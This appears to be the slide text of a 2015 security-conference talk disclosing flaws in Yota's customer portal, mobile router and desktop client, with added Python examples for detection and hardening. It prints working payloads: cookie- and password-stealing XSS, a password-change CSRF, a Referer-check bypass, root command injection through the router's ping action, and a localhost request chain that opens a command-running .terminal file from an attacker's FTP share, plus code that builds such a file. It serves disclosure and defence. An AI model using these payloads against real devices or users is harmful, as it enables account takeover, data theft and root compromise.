Vulnerabilities in the software of Yota telecommunication equipment
ZeroNights 2015
@cyberpunkych
WHOAMI?

* Security researcher at HeadLight Security
* "Attacking MongoDB" at ZeroNights 2012
* "Database honeypot by design" at Defcon Russia
* Worked at Positive Technologies from 2012 to 2015
* "Hacking routers as Web Hacker" at Defcon Moscow
* Member of DC 7499
WHAT IS 4G IN 2015?

Modems, routers, mobile routers, phones, etc.
WHAT IS YOTA?

Most used Yota devices:

* Yota Lua (simple USB modem)
* Yota Many (mobile router)
* Yota Swift (modem + Wi-Fi router)
WHAT IS YOTA?

Yota web interface: the my.yota.ru personal cabinet (screenshot). Tabs: Profile, Bank cards, Payments, Yota 4G. A speed slider sets the access speed and plan conditions, which can be changed at any moment without extra payment ("you pay only for what you really need"); plans cost from 0 to 1400 rubles per month with unlimited traffic. The page shows the SIM balance (48 rub.), the current plan (days left, max. speed in kbit/s), the linked MasterCard (... 1337), "top up from the linked card" and "pay from another card".

WHAT IS ҮОТА? 


Yota software: 


Приложение Yota (Win) 
Совместимо с Windows 8, Windows 7, Vista, XP (32-bit) 


27 Mb 
Скачать 


Приложение Yota (Mac) 


Совместимо с Mac OS Х 10.5 Leopard (32-bit), 10.6 Snow Leopard (32-bit), 10.7 Lion, 10.8 Mountain 


Lion, 10.10 Yosemite 


23 Mb 
Скачать 


90-91-5065 в TD 


Подключите устройство 


Подключите устройство A 


Баланс Баланс 
Войти в Профиль 
Задать вопрос 

Статистика 


Задать вопрос 


Статистика 


WHAT CAN WE ATTACK?

* Yota personal cabinet (XSS, CSRF, info leakage)
* Yota Many (sensitive info leakage, RCE)
* Yota Swift (RCE)
* Yota Access (sensitive info leakage, RCE)
YOTA SERVICES

Even one XSS can compromise all your data.

First XSS (screenshot, the "Redirect to payment page" on my.yota.ru): a parameter is reflected without encoding, payload

"><script>alert(document.domain)</script>

Second XSS (screenshot): attribute injection in

https://my.yota.ru/pluto/remote/roox.socialmappings.selfcare?style=123" onError="alert(document.cookie)

The alert shows the full cookie jar of my.yota.ru: JSESSIONID, FwdLogin, amlbcookie, dlbcookie, the NSC_ load-balancer cookie, iPlanetDirectoryPro (the SSO token) and the Google Analytics / Yandex.Metrica cookies. The session cookies are readable from JavaScript, i.e. they carry no HttpOnly flag.

...but I found 2 of them ;)
YOTA SERVICES

"XSS is boring, it can't see my password"

Don't be so sure if you save your passwords in Firefox. The PoC page (yota.hlsec.ru/bugs/bug-xss.html, screenshot) uses the XSS to embed

<iframe src="https://my.yota.ru/selfcare/login" ...>

in the my.yota.ru origin; Firefox autofills the saved credentials into the login form inside the frame, and the same-origin script reads them out: "Your saved pass: 1231234".
YOTA SERVICES

Just another CSRF with password change.

The password change form at https://my.yota.ru/selfcare/setPassword ("Change password: for your security, change your password", screenshot) can be submitted cross-site, so the PoC page changes the victim's password.

Thanks to Yota support for this bug ;)
YOTA SERVICES

Get a user's balance by VK id ;)

Request (Burp Repeater, screenshot):

GET /pluto/remote/roox.balance.vk?viewer_id=<VK user id>&method=balance HTTP/1.1
Host: my.yota.ru
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest

Response:

HTTP/1.1 200 OK
Server: YOTA/3.0
X-Powered-By: YOTA/3.0
Pragma: no-cache
Cache-Control: no-cache
Date: Tue, 24 Nov 2015 12:44:17 GMT

{"balance": 8, "Success": true}

The only thing the endpoint needs is the VK user id of the victim.
YOTA SERVICES

OK, all of that is really boring. Go next!

Putting it together (PoC page yota.hlsec.ru/bugs/bug-xss.html, screenshot): when a victim who is logged in to my.yota.ru opens the page, it reports (values from the author's own test account):

Logged in my.yota.ru: True
First & last name, e-mail, phone
Balance: 48 rub.
VK: the linked vkontakte.ru profile
FB: No account
WHAT CAN WE ATTACK?

* Yota personal cabinet (XSS, CSRF, info leakage)
* Yota Many (sensitive info leakage, RCE)
* Yota Swift (RCE)
* Yota Access (sensitive info leakage, RCE)
YOTA DEVICES

Just press the button and go 4G! ...or plug it into a USB port.

The web admin panel at http://10.0.0.1 looks good (screenshot, next to the PoC page bug-many.html). Hmm...
YOTA DEVICES

Wow, such referer check, nice protection!

Request from the PoC page (Burp Repeater, screenshot):

GET /devcontrol?callback=jQuery17204916625038231476_1448367297234&command=getStatus&_=1448367347400 HTTP/1.1
Host: 10.0.0.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://yota.hlsec.ru/
Cookie: YRlanguage=ru

Response:

HTTP/1.1 200 OK
Server: lighttpd/1.4.33
Content-Type: text/javascript; charset=utf-8

Wrong referer: http://yota.hlsec.ru/

The same request with Referer: http://10.0.0.1.yota.hlsec.ru/ (the PoC is served from a DNS name that starts with the device address):

HTTP/1.1 200 OK
Server: lighttpd/1.4.33
Content-Type: text/javascript; charset=utf-8
Date: Tue, 24 Nov 2015 12:18:48 GMT

jQuery17204916625038231476_1448367297234({"connected":true,"statusDescr":"Connected","networkType":"4G","extNetworkType":"EUTRAN","numWiFiUsers":[1,0,0,0],"wiFiEnabled":[1,1,0,0], ...

The check evidently matches the string 10.0.0.1 rather than the full origin, so 10.0.0.1.yota.hlsec.ru passes it, and the JSONP callback hands the device status to the attacker's page.
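An added example (not code from the talk or from the Yota Many firmware) that shows why a Referer check matching on the device address is not an origin check. The firmware's real logic is not known; weak_referer_check() is an assumed implementation that reproduces what the slides show (http://yota.hlsec.ru/ rejected, http://10.0.0.1.yota.hlsec.ru/ accepted), and the Referer values beyond those two are constructed.

```python
# Added example, not the device's code. weak_referer_check() is an assumed
# implementation consistent with the slides: a prefix match on the address.
from typing import List, Tuple
from urllib.parse import urlsplit

DEVICE_HOST = "10.0.0.1"


def weak_referer_check(referer: str) -> bool:
    """Assumed device logic: does the Referer start with the device address?"""
    return referer.startswith("http://" + DEVICE_HOST)


def strict_referer_check(referer: str) -> bool:
    """Parse the URL and compare the host component exactly."""
    if not referer:
        return False                      # no Referer at all: treat as cross-site
    parts = urlsplit(referer)
    if parts.scheme != "http":
        return False
    return parts.hostname == DEVICE_HOST  # hostname drops port and userinfo


# Constructed Referer values: the two from the slides plus shapes that a
# prefix match also lets through.
SAMPLE_REFERERS = [
    "http://yota.hlsec.ru/",                # rejected by both checks
    "http://10.0.0.1/index.html",           # the panel itself
    "http://10.0.0.1.yota.hlsec.ru/",       # DNS name starting with the address
    "http://10.0.0.1@evil.example/",        # the address as userinfo
    "http://10.0.0.1.evil.example:8080/x",  # the address as a subdomain, with port
]


def evaluate(referers: List[str]) -> List[Tuple[str, bool, bool]]:
    """(referer, weak verdict, strict verdict) for each value."""
    return [(r, weak_referer_check(r), strict_referer_check(r)) for r in referers]


if __name__ == "__main__":
    for referer, weak, strict in evaluate(SAMPLE_REFERERS):
        print(f"{referer:40} weak={weak!s:5} strict={strict}")
```

Even the strict version is only a stopgap: browsers omit the Referer under many referrer policies and proxies strip it, so the real fix for a router panel is to stop serving device state through JSONP and to require an unguessable token (or a session cookie with SameSite) on every state-reading and state-changing request.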
YOTA DEVICES

Router. Bugs. Hmm. RCE?

The "ping" action of the admin panel passes its url parameter to a shell (Burp Repeater, screenshots). Request:

GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=ping&url=||uname%20-a||&reason=... HTTP/1.1
Host: 10.0.0.1
Referer: http://10.0.0.1.yota.hlsec.ru/bugs/bug-many.html
Cookie: YRlanguage=ru

Response:

HTTP/1.1 200 OK
Server: lighttpd/1.4.33
Content-Type: text/html
Content-Length: 80
Date: Tue, 24 Nov 2015 12:21:09 GMT

Linux 9615-cdp 3.0.21+ #1 PREEMPT Tue Dec 16 14:38:17 CST 2014 armv7l GNU/Linux

Of course!

The same request with url=||whoami||:

HTTP/1.1 200 OK
Server: lighttpd/1.4.33
Content-Type: text/html
Content-Length: 5
Date: Tue, 24 Nov 2015 12:21:48 GMT

root

We are root. Classic. The value is spliced into a command line such as ping <url>, so ping fails on an empty host and the shell's || runs whatever follows.
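An added example, not the Yota Many CGI code (which is not available): the assumed vulnerable construction next to a hardened one. build_ping_vulnerable() assumes sysconf.cgi concatenates the url parameter into a shell command line, which is consistent with `||uname -a||` running on the device; nothing in the block executes a command unless run_ping_safe() is called explicitly.

```python
# Added example, not the device's code. The vulnerable builder is an assumed
# reconstruction of the pattern behind action=ping; the safe version allows
# only an IP address or a plain host name and never involves a shell.
import ipaddress
import re
import subprocess
from typing import List, Optional

# RFC 1123 host name: 1..63-char labels of letters, digits and hyphens that
# do not start or end with a hyphen, at most 253 characters overall.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def build_ping_vulnerable(url: str) -> str:
    """Assumed original pattern: string concatenation later run by a shell.
    With url="||whoami||" the shell runs `ping -c 4` (fails: no host), then
    `whoami` because of the ||, and the trailing || swallows the error."""
    return "ping -c 4 " + url


def validate_ping_target(url: str) -> Optional[str]:
    """Return the target if it is an IPv4/IPv6 address or a plain host name.
    The host-name rule also rejects a leading '-', so the target can never
    be parsed as a ping option."""
    try:
        return str(ipaddress.ip_address(url))
    except ValueError:
        pass
    return url if _HOSTNAME_RE.match(url) else None


def build_ping_safe(url: str) -> Optional[List[str]]:
    """argv list for subprocess (no shell), or None if the input is rejected."""
    target = validate_ping_target(url)
    if target is None:
        return None
    return ["ping", "-c", "4", target]


def run_ping_safe(url: str, timeout: float = 15.0) -> str:
    """Run ping without a shell; raises ValueError for rejected input."""
    argv = build_ping_safe(url)
    if argv is None:
        raise ValueError("invalid ping target: %r" % url)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return result.stdout


if __name__ == "__main__":
    for candidate in ["8.8.8.8", "yota.ru", "||whoami||", "-f", "10.0.0.1; reboot"]:
        print(f"{candidate!r:20} vulnerable: {build_ping_vulnerable(candidate)!r:40}"
              f" safe argv: {build_ping_safe(candidate)}")
```

The allow-list is the important part: quoting the value with shlex.quote would stop `||whoami||` but still lets an attacker pass ping options, and a deny-list of shell metacharacters is always one character short.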
YOTA DEVICES

Final result (PoC page 10.0.0.1.yota.hlsec.ru/bugs/bug-many.html, screenshot):

Wi-Fi hotspot name: ATOL
Wi-Fi hotspot password: ATOLATOL
Yota IP: 10.164.18.240
Yota IMEI: 35891604297118
Yota IMSI: 250110101308953
Your internal IP: 10.0.0.23
Yota's "uname -a": Linux 9615-cdp 3.0.21+ #1 PREEMPT Tue Dec 16 14:38:17 CST 2014 armv7l GNU/Linux

Other devices, such as Yota Swift, are affected too!
WHAT CAN WE ATTACK?

* Yota personal cabinet (XSS, CSRF, info leakage)
* Yota Many (sensitive info leakage, RCE)
* Yota Swift (RCE)
* Yota Access (sensitive info leakage, RCE)
YOTA SOFTWARE

Software? But I'm just a web script-kiddie.

Activity Monitor (screenshot): the client runs as YotaAccessService.app / process "Yota", parent process launchd, under the logged-in user; its open files include a listening socket localhost:commplex-main, i.e. TCP port 5000 on 127.0.0.1. The client window ("Connect the device", session duration, max. speed per session, current speed, received/sent, signal, IP address, BSID, identifier, Statistics) is a web UI.

Wow, a web interface on port 5000. Interesting...
YOTA SOFTWARE

Oh, this web again. I love it.

GET http://127.0.0.1:5000/events?lastEventId=&r=5296692676227206 returns a Server-Sent Events stream (screenshot):

HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream
Date: Tue, 24 Nov 2015 12:55:55 GMT

event: storageInitEvent
data: {"LAST_ROSS_RESULT": "{\"cm\":{\"welcomeScreen\":\"\",\"additionalText\":{\"en_US\":\"Network segment is temporary overloaded\",\"ru_RU\":\"...\"},\"menuTurboText\":{\"en_US\":\"Request coverage improvement\",\"ru_RU\":\"...\"},\"turboIcon\":\"TB_Main\",\"trayIcon\":\"Tray_Yellow\",\"trayStatusText\":{\"en_US\":\"Network segment is temporary overloaded\",\"ru_RU\":\"...\"},\"mainText\":{\"en_US\":\"Connected to Yota\",\"ru_RU\":\"...\"},\"showTurboButton\":1,\"turboText\":{\"en_US\":\"\",\"ru_RU\":\"\"},\"additionalLink\":{\"en_US\":\"http://www.yota.ru/bsload?{bs_status}\",\"ru_RU\":\"http://www.yota.ru/bsload?{bs_status}\"},\"barsIcon\":\"Bars_Warning\",\"flyoutTitleText\":{\"en_US\":\"Network is temporary overloaded\",\"ru_RU\":\"...\"},\"trayHintText\":{\"en_US\":\"\",\"ru_RU\":\"\"},\"turboLink\":{\"en_US\":\"http://www.yota.ru/bsload?{bs_status}\",\"ru_RU\":\"http://www.yota.ru/bsload?{bs_status}\"}},\"locales\":[\"en_US\",\"ru_RU\"],\"turboWidget\":{\"buttonAction\":{\"en_US\":\"\",\"ru_RU\":\"\"},\"buttonIcon\":\"\",\"showButton\":0,\"buttonText\":{\"en_US\":\"\",\"ru_RU\":\"\"}},\"bsInfo\":{\"bsStatus\":99,\"avaUsers\":56,\"regionId\":\"MOSCOW\"}}", "com.roox.cm.Common.App.NewsForm.Properties.unit.Height": ...

(the "..." stand for the Russian duplicates of the en_US strings and for the rest of the screenshot.) Note the "data" payload is JSON carrying more JSON inside a string.

YOTA SOFTWARE

Send a request and wait for the reply on :5000/events!

PoC page yota_event_logging.html ("get info" / "send info", screenshot) and the messages it receives on the event stream (Python console, screenshot; Russian UI captions translated):

{"id":"com.roox.cm.account.update","data":{"context":{"slider":{"isVisible":false,"isEnabled":false,"backSlider":{"value":-1,"isVisible":false},"applyButton":{"text":"Connect","isEnabled":false}},"hint":{"isVisible":false},"product":{"caption":"Current conditions","actualityDate":"","isEnabled":false,"isVisible":false,"price":{"caption":"Cost","value":""},"speed":{"caption":"Speed","value":""},"time":{"caption":"Time left","value":""}},"offer":{"caption":"New conditions","actualityDate":"","isVisible":false,"price":{"caption":"Cost","value":""},"speed":{"caption":"Speed","value":""},"time":{"caption":"Time remaining","value":""}},"balance":{"isVisible":true,"caption":"Balance","value":""},"turbo":{"isVisible":false,"isEnabled":false,"caption":"Enable max. speed","offers":[]},"selfcare":{"isVisible":true,"text":"Sign in to Profile"}}},"__messageSource":"cd3520e2-7cf9-1489-66a5-83ec2fa87a16"}

{"id":"com.roox.cm.Common.App.Events.SummaryCollectingStarted","data":{"kind":2,"isDetailed":false}}

{"id":"com.roox.cm.Common.App.GenerateSummary","data":{"isDetailed":false,"kind":2},"__messageSource":"54f35129-4957-bafe-3fa0-e29acfdd88db"}

{"id":"com.roox.cm.Common.App.Events.SummaryCollectingCompleted","data":{"kind":2,"isDetailed":false,"content":"01. Report Generation Time (Local): 24.11.2015, 16:11:04\n02. Report Generation Time (UTC): 24.11.2015, 13:11:04\n\n15. YOTA Version: YD3.1.0\n16. YOTA State: No Device\n17. Operating System: Mac OS X\n18. Operating System Version: 10.11.1 (15B42)\n19. Computer Manufacturer: Apple\n20. Computer Model: MacBookPro9,2\n\nYOTA Full Version: Master-147.6446_auto.YD_RUS (YD.RUS)\nDeveloped by RooX (TM) www.rooxteam.com\n"}}

A GenerateSummary message sent to the client makes it collect a diagnostic report about the machine and publish it on the event stream, where the page reads it.
YOTA SOFTWARE

OK, we can read some data, and so?

The page can also talk to the client (Burp Repeater, screenshot): a cross-origin POST to the /action endpoint on localhost:5000, sent from 10.0.0.1.yota.hlsec.ru/bugs/yota_event_logging.html with Content-Type: application/x-www-form-urlencoded and a JSON message in the body:

{"id":"message","data":"{\"id\":\"com.roox.cm.Common.App.GenerateSummary\",\"data\":{\"isDetailed\":false,\"kind\":2},\"__messageSource\":\"54f35129-4957-bafe-3fa0-e29acfdd88db\"}"}

The service answers 200 OK with Content-Type: application/json. Because the body goes out as a form-encoded "simple" request, the browser sends it without a CORS preflight, and the service does not reject a foreign Origin, so any web page the user opens can drive the client.

My lovely game: playing with parameters & requests!
With isDetailed set to true the report (PoC page, screenshot) contains, among other fields:

01. Report Generation Time (Local): 25.08.2015, 13:09:56
02. Report Generation Time (UTC): 25.08.2015, 10:09:56
05. IP Address: 19.134.199.132
06. ID: 0101259677
07. ECGI: 25011F271604
08. Signal (SINR/RSRP): 2/-95
15. YOTA Version: YD3.1.0
16. YOTA State: Connected
17. Operating System: Mac OS X
18. Operating System Version: 10.10.5 (14F27)
19. Computer Manufacturer: Apple
20. Computer Model: MacBookPro9,2
30. WWAN Technology
31. Network
32. ECGI
33. Frequency
34. Signal Level

followed by the complete ifconfig output of the host (lo0, gif0, stf0, en0, en1, en2, fw0, p2p0 with their MAC/link-layer addresses, MTUs and media status).
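An added example, not code from the talk or from the Yota client: a parser for the text/event-stream served on 127.0.0.1:5000/events and a decoder for the message envelope, whose "data" member is often JSON nested inside a JSON string. SAMPLE_STREAM is constructed from the fields visible on the slides (values trimmed, one comment line and one split data line added to exercise the SSE framing); the event names of the individual messages are not known, so they use the SSE default "message".

```python
# Added example, not the Yota client's code. The sample stream is constructed
# from the slides; real events carry more fields.
import json
from typing import Any, Dict, Iterator, List

SUMMARY_DONE = "com.roox.cm.Common.App.Events.SummaryCollectingCompleted"

# storageInitEvent carries a JSON document serialised *inside* a JSON string.
_ROSS = json.dumps({"cm": {"mainText": {"en_US": "Connected to Yota"}},
                    "bsInfo": {"bsStatus": 99, "avaUsers": 56, "regionId": "MOSCOW"}})

SAMPLE_STREAM = "".join([
    "event: storageInitEvent\n",
    "data: " + json.dumps({"LAST_ROSS_RESULT": _ROSS}) + "\n",
    "\n",
    ": comment line, servers send these as keep-alives\n",
    'data: {"id":"com.roox.cm.Common.App.GenerateSummary",\n',
    'data:  "data":{"isDetailed":false,"kind":2},"__messageSource":"54f35129-4957-bafe-3fa0-e29acfdd88db"}\n',
    "\n",
    'data: {"id":"' + SUMMARY_DONE + '","data":{"kind":2,"isDetailed":false,',
    '"content":"15. YOTA Version: YD3.1.0\\n16. YOTA State: No Device\\n',
    '17. Operating System: Mac OS X\\n18. Operating System Version: 10.11.1 (15B42)\\n"}}\n',
    "\n",
])


def parse_sse(stream: str) -> Iterator[Dict[str, str]]:
    """Yield {"event", "data"} per event: events end at a blank line, several
    data: lines are joined with "\\n", one space after the colon is dropped,
    and lines starting with ":" are comments (the WHATWG EventSource rules)."""
    name, data = "message", []  # type: str, List[str]
    for line in stream.splitlines():
        if line == "":
            if data:
                yield {"event": name, "data": "\n".join(data)}
            name, data = "message", []
            continue
        if line.startswith(":"):
            continue
        field, _, value = line.partition(":")
        if value.startswith(" "):
            value = value[1:]
        if field == "event":
            name = value
        elif field == "data":
            data.append(value)
    if data:
        yield {"event": name, "data": "\n".join(data)}


def decode_message(data: str) -> Dict[str, Any]:
    """Decode the client's envelope; members that hold JSON-in-a-string
    ("data" of a posted message, LAST_ROSS_RESULT) are parsed a second time."""
    obj = json.loads(data)
    for key in ("data", "LAST_ROSS_RESULT"):
        value = obj.get(key)
        if isinstance(value, str):
            try:
                obj[key] = json.loads(value)
            except ValueError:
                pass  # a plain string, leave it
    return obj


def summary_fields(content: str) -> Dict[str, str]:
    """Turn numbered report lines ("15. YOTA Version: YD3.1.0") into a dict."""
    fields: Dict[str, str] = {}
    for line in content.splitlines():
        number, sep, rest = line.partition(". ")
        if not sep or not number.isdigit():
            continue
        field_name, _, value = rest.partition(": ")
        fields[field_name] = value
    return fields


def extract_reports(stream: str) -> List[Dict[str, str]]:
    """Collect every diagnostic report published on the event stream."""
    reports = []
    for event in parse_sse(stream):
        message = decode_message(event["data"])
        if message.get("id") == SUMMARY_DONE:
            reports.append(summary_fields(message["data"]["content"]))
    return reports


if __name__ == "__main__":
    for event in parse_sse(SAMPLE_STREAM):
        print(event["event"], decode_message(event["data"]).get("id", "(no id)"))
    print(extract_reports(SAMPLE_STREAM))
```

Pointing the same parser at a live stream (an HTTP client reading the response body line by line) is enough to log everything the service broadcasts to any page that can reach port 5000, which is the leak the slides demonstrate.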


YOTA SOFTWARE

OK. WHERE IS RCE?!1
YOTA SOFTWARE

Here.

POST /action HTTP/1.1
Host: localhost:5000
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

{"id":"message","data":"{\"id\":\"com.roox.cm.Common.App.OpenUrl\",\"data\":{...},\"__messageSource\":\"any_text\"}"}

Response:

HTTP/1.1 200 OK
Content-Type: application/json
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2

{}

An OpenUrl message makes the client hand the given URL to the operating system, and __messageSource is accepted with any text.
YOTA SOFTWARE

Short instruction for OS X: from opening a file to full RCE

* `open ftp://anon@1.1.1.1/` mounts the FTP share at /Volumes/1.1.1.1/ (OpenUrl hands the URL to the system, so the attacker's server gets mounted)
* A .terminal file (a Terminal.app profile) executes any commands after opening, so the next OpenUrl points at the .terminal file on the share
* Sometimes you get root without any exploits (remember the 'sudo' feature in OS X: the cached sudo credentials are not tied to the terminal, so a fresh window can run `sudo id` without a password while the user's timestamp is still valid)

yota_rce.terminal (screenshot; the file is an XML plist):

<key>WindowTitle</key>
<string>Hacked!!!</string>
<key>CommandString</key>
<string>cat /etc/passwd; uname -a; sudo id; osascript -e 'display dialog "PWND!!1"'</string>

Result (screenshot): Terminal prints /etc/passwd, the kernel banner (Darwin ... root:xnu-3247.10.11~1/RELEASE_X86_64 x86_64), "uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),...,80(admin),..." from sudo id, and the "PWND!!1" dialog.
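An added example, not code from the talk: it builds the kind of Terminal.app profile the slide shows and, more usefully for defenders, inspects one. A .terminal file is an XML plist; when Terminal.app opens it, it applies the profile and runs CommandString in a new window. The command string is the one visible on the slide; the file name, window title and the extra profile keys (name, type, RunCommandAsShell, which follow Terminal.app's exported-profile format) are assumptions.

```python
# Added example, not from the talk. plistlib is the standard-library plist
# codec; the profile keys beyond WindowTitle/CommandString are assumptions.
import plistlib
from typing import Any, Dict, Optional

# The command string shown on the slide.
COMMANDS = "cat /etc/passwd; uname -a; sudo id; osascript -e 'display dialog \"PWND!!1\"'"


def build_terminal_profile(command: str, title: str = "Hacked!!!") -> bytes:
    """Serialize a minimal .terminal profile that runs `command` when opened."""
    profile = {
        "name": title,
        "type": "Window Settings",
        "WindowTitle": title,
        "CommandString": command,
        "RunCommandAsShell": True,  # run through the user's shell, as on the slide
    }
    return plistlib.dumps(profile, fmt=plistlib.FMT_XML)


def inspect_terminal_profile(data: bytes) -> Optional[Dict[str, Any]]:
    """Detection helper: what would this .terminal file run? None if it is not
    a plist or carries no CommandString. Run it over downloads, mail
    attachments and files on freshly mounted shares before they are opened."""
    try:
        profile = plistlib.loads(data)
    except Exception:
        return None
    if not isinstance(profile, dict) or "CommandString" not in profile:
        return None
    command = str(profile["CommandString"])
    return {
        "title": str(profile.get("WindowTitle", profile.get("name", ""))),
        "command": command,
        "uses_sudo": "sudo" in command,  # rides the cached sudo timestamp
    }


if __name__ == "__main__":
    blob = build_terminal_profile(COMMANDS)
    print(blob.decode())
    print(inspect_terminal_profile(blob))
```

The "uses_sudo" flag exists because of the third bullet above: a command string containing sudo turns a user-level code execution into root whenever the victim has used sudo in the last few minutes, so it deserves a higher severity than a plain command.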


YOTA SOFTWARE

Video here.
CONCLUSION

Test yourself here: http://yota.hlsec.ru/ (screenshot: the site's "check status" page).

Questions?
CONCLUSION

Thanks:

* Oleg Kupreev (@090h)
* Sergey Vishnyakov (@n3tw0rk)
* Timur Yunusov (@a66at)
* Dmitry Evteev (@devteev)
* Vyacheslav Egoshin (@vegoshin)
* PsychOtr1a (@PsychOtr1a)
* DC7499 and the 2600 community
* Matt Austin (From XSS to RCE)

Thank you for your attention!

@cyberpunkych